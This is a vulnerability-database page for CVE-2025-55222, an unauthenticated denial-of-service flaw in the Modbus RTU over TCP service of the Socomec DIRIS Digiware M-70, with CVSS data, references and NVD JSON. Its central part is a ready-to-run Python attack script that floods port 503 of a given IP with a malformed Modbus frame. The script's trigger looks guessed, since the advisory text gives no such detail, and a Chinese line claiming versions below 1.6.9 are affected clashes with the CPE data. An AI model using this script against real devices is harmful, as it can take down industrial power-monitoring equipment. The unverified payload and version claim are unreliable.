CVE-2025-55222

Description

A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP USB Function functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to a denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.This vulnerability is specific to the malicious message sent via Modbus RTU over TCP on port 503.

CVSS Details

CVSS Score

8.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:* - NOT VULNERABLE

Socomec DIRIS Digiware M-70 固件版本 < 1.6.9

Socomec DIRIS Digiware M-70 1.6.9 (已知受影响)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-55222 PoC - Modbus RTU over TCP DoS for Socomec DIRIS Digiware M-70
Reference: https://www.cve.org/CVERecord?id=CVE-2025-55222
"""

import socket
import struct
import sys

def create_modbus_rtu_packet(function_code, data):
    """
    Create a Modbus RTU over TCP packet
    Modbus RTU over TCP format:
    - Transaction ID (2 bytes)
    - Protocol ID (2 bytes)
    - Length (2 bytes)
    - Unit ID (1 byte)
    - Function Code (1 byte)
    - Data (variable)
    """
    transaction_id = 0x0001
    protocol_id = 0x0000
    unit_id = 0x01
    
    # Build PDU (Protocol Data Unit)
    pdu = struct.pack('B', function_code) + data
    
    # Build ADU (Application Data Unit)
    length = 1 + len(pdu)  # Unit ID + PDU length
    adu = struct.pack('>HHH', transaction_id, protocol_id, length)
    adu += struct.pack('B', unit_id)
    adu += pdu
    
    return adu

def send_malicious_packet(target_ip, target_port=503):
    """
    Send a crafted Modbus RTU over TCP packet to trigger DoS
    This packet is designed to cause service disruption
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(5)
    
    try:
        sock.connect((target_ip, target_port))
        
        # Craft malicious packet with malformed data
        # Using function code 0x65 (custom) with excessive data length
        malicious_data = b'\x41' * 500  # Excessive length data
        packet = create_modbus_rtu_packet(0x65, malicious_data)
        
        print(f"[*] Sending malicious packet to {target_ip}:{target_port}")
        print(f"[*] Packet length: {len(packet)} bytes")
        sock.send(packet)
        
        print("[+] Packet sent successfully")
        print("[*] Target may be experiencing DoS condition")
        
    except socket.error as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 503
    
    send_malicious_packet(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-55222
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-55222
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-55222/
[4] VulDB https://vuldb.com/cve/CVE-2025-55222
[5] https://talosintelligence.com/vulnerability_reports/TALOS-2025-2251

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-55222", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:54.620", "lastModified": "2025-12-05T20:48:02.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP USB Function functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to a denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.This vulnerability is specific to the malicious message sent via Modbus RTU over TCP on port 503."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:*", "matchCriteriaId": "C07608BE-E7E3-44F5-AE9A-4AE36679F58A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:*", "matchCriteriaId": "153A9D26-2C76-4B6B-AFD8-22DEB2081F34"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2251", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}